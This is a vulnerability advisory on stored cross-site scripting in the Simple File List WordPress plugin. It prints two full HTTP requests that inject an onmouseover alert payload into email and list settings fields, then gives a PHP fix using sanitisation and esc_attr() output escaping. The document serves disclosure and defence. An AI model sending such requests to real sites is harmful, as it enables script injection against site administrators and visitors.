The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).
# First Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=email_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Demail_settings&eeNotifyTo=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyCc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyBcc=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFrom=aa%40aa.aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyFromName=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifySubject=aatestvalue%22+onmouseover%3Dalert%281%29+a%3D%22a&eeNotifyMessage=Greetings%2C%0D%0A%0D%0AYou+should+know+that+a+file+has+been+uploaded+to+your+website.%0D%0A%0D%0A%5Bfile-list%5D%0D%0A%0D%0AFile+List%3A+%5Bweb-page%5D&submit=SAVE

+++++++++++++++++++++++

# Second Stored XSS - HTTP Request

POST /blog/wp-admin/?page=ee-simple-file-list&tab=settings&subtab=list_settings HTTP/1.1
Host: target
...
...

eePost=TRUE&ee-simple-file-list-settings-nonce=nonce&_wp_http_referer=%2Fblog%2Fwp-admin%2F%3Fpage%3Dee-simple-file-list%26tab%3Dsettings%26subtab%3Dlist_settings&eeShowList=YES&eeSortBy=DateMod&eeSortOrder=Descending&eeGenerateImgThumbs=YES&eeShowFileThumb=YES&eeLabelThumb=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeLabelName=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileDate=YES&eeLabelDate=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowFileSize=YES&eeLabelSize=Thumb%22+onmouseover%3Dalert%281%29+a%3D%22a&eeShowHeader=YES&eeSmoothScroll=YES&eeShowFileDescription=YES&eeShowFileExtension=YES&eeShowFileActions=YES&eeShowFileOpen=YES&eeShowFileDownload=YES&eeShowFileCopyLink=YES&submit=SAVE
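The root cause described above is that the settings values are stored and later written back into a double-quoted HTML attribute without sanitisation on save or escaping on output; the payload in both requests (`testvalue" onmouseover=alert(1) a="a`) simply closes the value attribute and adds an event handler. The following is an added example, not the plugin's own code, of how a WordPress settings handler closes both gaps. The option group, option name and the `ee_example_*` function names are assumptions; the field names are taken from the requests above.

```php
<?php
// Added example (not the plugin's code): a hypothetical settings handler that
// sanitises on save and escapes on output. Field names mirror the advisory
// (eeNotifyTo, eeLabelThumb, ...); option/function names are assumptions.

// Map each setting to the sanitiser that matches its intended content.
function ee_example_sanitize_settings( array $input ) : array {
    $email_fields = array( 'eeNotifyTo', 'eeNotifyCc', 'eeNotifyBcc', 'eeNotifyFrom' );
    $text_fields  = array( 'eeNotifyFromName', 'eeNotifySubject',
                           'eeLabelThumb', 'eeLabelName', 'eeLabelDate', 'eeLabelSize' );
    $clean = array();

    foreach ( $email_fields as $f ) {
        // sanitize_email() strips every character that is not valid in an
        // address, so quotes and spaces from the payload never reach the DB.
        $clean[ $f ] = isset( $input[ $f ] ) ? sanitize_email( wp_unslash( $input[ $f ] ) ) : '';
    }

    foreach ( $text_fields as $f ) {
        // sanitize_text_field() strips tags and control characters but keeps
        // the double quote as data; escaping on output (below) handles it.
        $clean[ $f ] = isset( $input[ $f ] ) ? sanitize_text_field( wp_unslash( $input[ $f ] ) ) : '';
    }

    // Multi-line message body: keep line breaks, allow no markup.
    $clean['eeNotifyMessage'] = isset( $input['eeNotifyMessage'] )
        ? sanitize_textarea_field( wp_unslash( $input['eeNotifyMessage'] ) )
        : '';

    return $clean;
}

// Registering the option with a sanitize_callback makes the Settings API run
// the sanitiser before update_option(), independently of who submits the form.
// Core's kses filtering (controlled by unfiltered_html) applies to post and
// comment content, not to plugin options, so the plugin has to do this itself.
add_action( 'admin_init', function () {
    register_setting( 'ee_example_group', 'ee_example_settings', array(
        'type'              => 'array',
        'sanitize_callback' => 'ee_example_sanitize_settings',
    ) );
} );

// Output side: escape for the context the value lands in. esc_attr() encodes
// the double quote as &quot;, so a stored value cannot terminate the attribute
// and append onmouseover=... even if sanitisation were bypassed.
function ee_example_render_field( string $name, string $value ) : string {
    return sprintf(
        '<input type="text" name="%1$s" value="%2$s">',
        esc_attr( $name ),
        esc_attr( $value )
    );
}
```

Note that sanitisation alone would not have stopped the second request: `Thumb" onmouseover=alert(1) a="a` contains no tags, so `sanitize_text_field()` passes it through unchanged, and it is the `esc_attr()` call at render time that neutralises it. Treat output escaping as the mandatory control and input sanitisation as defence in depth.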
Raad Haddad of Cloudyrion GmbH
Yes
2022-09-19 (about 1 year ago)